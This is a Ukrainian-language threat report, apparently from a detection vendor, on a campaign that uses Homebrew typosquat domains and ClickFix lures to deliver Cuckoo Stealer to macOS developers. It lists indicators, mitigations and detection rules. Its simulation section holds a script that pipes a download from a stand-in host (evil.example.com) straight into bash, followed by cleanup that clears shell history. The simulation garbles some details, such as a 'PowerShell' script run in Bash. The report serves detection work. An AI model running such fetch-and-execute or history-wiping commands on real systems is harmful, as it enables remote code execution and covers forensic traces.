Фейкові Homebrew Типосквати Використовуються для Доставки Cuckoo Stealer через ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
У звіті описується кампанія, яка зловживає помилково написаними доменами Homebrew, щоб заманити розробників macOS виконувати шкідливі команди «install» за допомогою техніки ClickFix. Сформований однорядковий запит curl відправляє жертв у підконтрольну атакуючим інфраструктуру, доставляючи завантажувач для збирання облікових даних, а потім Cuckoo Stealer. Шкідливе програмне забезпечення зберігається через LaunchAgent, видаляє атрибути карантину і ексфільтрує облікові дані та дані гаманця через HTTPS. Виявлення слід зосередити на шаблонах команд curl і пов’язаній з ними інфраструктурі.
Розслідування
Дослідники простежили початкову принаду до homabrews.org, що розташовується на 5.255.123.244 в Нідерландах і розміщує кілька схожих доменів (включаючи raw.homabrews.org, який використовується для доставки). Завантажений скрипт запускає цикл dscl authonly для перевірки облікових даних macOS, потім отримує бінарний файл під назвою brew_agent. На другій стадії Cuckoo Stealer створює LaunchAgent plist, видаляє прапори карантину і спілкується з C2, використовуючи X25519 обмін ключами з XOR-зашифрованими навантаженнями. Мисливство за інфраструктурою виявило мережу щонайменше з шести доменів, що розділяють той же хостинг IP.
Пом’якшення
Навчіть розробників перевіряти URLs установки Homebrew і уникати копіювання та вставки ненадійних команд у Terminal. Увімкніть журналювання командного рядка і обмежте шаблони, де curl завантажує віддалені скрипти для негайного виконання, особливо такі, як «curl | sh». Захист кінцевих точок повинен попереджати про підозріле створення LaunchAgent і видалення атрибутів карантину. Мережевий захист повинен блокувати відомі шкідливі домени і позначати трафік до raw.homabrews.org та пов’язаних хостів.
Реагування
Коли виявляється підозріла команда curl, ізолюйте кінцеву точку, захопіть скрипт і двійковий brew_agent, зберіть plist LaunchAgent для аналізу. Скиньте збережені облікові дані і відкличте скомпрометовані токени, особливо для браузерів, Keychain та криптовалютних гаманців. Проведіть форензичний огляд прихованої директорії BrewUpdater, будь-яких створених ярликів і видаліть шкідливі файли. Оновіть виявлення з витягнутими IOC і стежте за повторним використанням тієї ж інфраструктури.
Потік атаки
Виявлення
Підозріла активність Keychain (через process_creation)
Перегляд
Підозріла зміна дозволів файлів у тимчасовій папці MacOS (через cmdline)
Перегляд
Підозрілі розташування та назви Plist на MacOS (через file_event)
Перегляд
Підозрілий доступ до збережених облікових даних браузера на MacOS (через process_creation)
Перегляд
Звук системного диска MacOS було вимкнено за допомогою Osascript (через cmdline)
Перегляд
Можливий збір за допомогою MacOS спроби виконання Screencapture (через cmdline)
Перегляд
Підозріла спроба виконання Curl [MacOS] (через cmdline)
Перегляд
IOCs (HashSha256) для виявлення: підробки Homebrew, використані для доставки Cuckoo Stealer через ClickFix
Перегляд
IOCs (SourceIP) для виявлення: підробки Homebrew, використані для доставки Cuckoo Stealer через ClickFix
Перегляд
IOCs (DestinationIP) для виявлення: підробки Homebrew, використані для доставки Cuckoo Stealer через ClickFix
Перегляд
Виявлення шкідливої команди установки macOS через ClickFix [Linux Process Creation]
Перегляд
Детекція домену та шкідливого IP у кампанії ClickFix [Network Indicators]
Перегляд
Виконання симуляції
Пререквізит: телеметрія та контрольний список базової перевірки повинні бути пройдені.
Обґрунтування: У цьому розділі детально описується точне виконання техніки атаки (TTP), призначене для запуску правила виявлення. Команди та розповіді ПОВИННІ безпосередньо відображати ідентифіковані TTP та націлюватися на генерацію точної телеметрії, яку очікує логіка виявлення. Абстрактні або не пов’язані приклади приведуть до помилкової діагностики.
-
Розповідь та команди атаки:
Атакуючий отримав шкідливий скрипт, закодований у PowerShell і розміщений на сервері C2. Щоб уникнути запису файлів на диск, атакуючий передає скрипт безпосередньо в оболонку Bash, використовуючиcurl -fsSLта-cпрапорець. Команда виконана інтерактивно з облікового запису скомпрометованого користувача, імітуючи легітимний «click-fix» інсталятор. Кроки такі:- Визначте URL-адресу шкідливого навантаження (наприклад,
https://evil.example.com/payload.sh). - Передайте завантаження у Bash, наказуючи Bash виконати вміст за допомогою
-c. - Завантаження виконує збір облікових даних, створює прихований файл, а потім видаляє тимчасовий скрипт (охоплюючи T1070.004).
- Визначте URL-адресу шкідливого навантаження (наприклад,
-
Сценарій регресійного тесту:
#!/usr/bin/env bash # ------------------------------------------------- # Сімулюйте шкідливий інсталятор macOS (стиль ClickFix) # ------------------------------------------------- set -euo pipefail MALICIOUS_URL="https://evil.example.com/payload.sh" # Передайте навантаження безпосередньо в Bash з -c curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)" # Припускається, що саме навантаження виконує свої шкідливі дії. # З метою тесту ми просто виведемо маркер. echo "Шкідливе навантаження виконано" -
Очисткі команди:
# Видаліть усі файли, які могли бути створені навантаженням rm -f /tmp/payload.sh # За бажанням, очистіть історію команд, щоб зменшити форензичні сліди history -c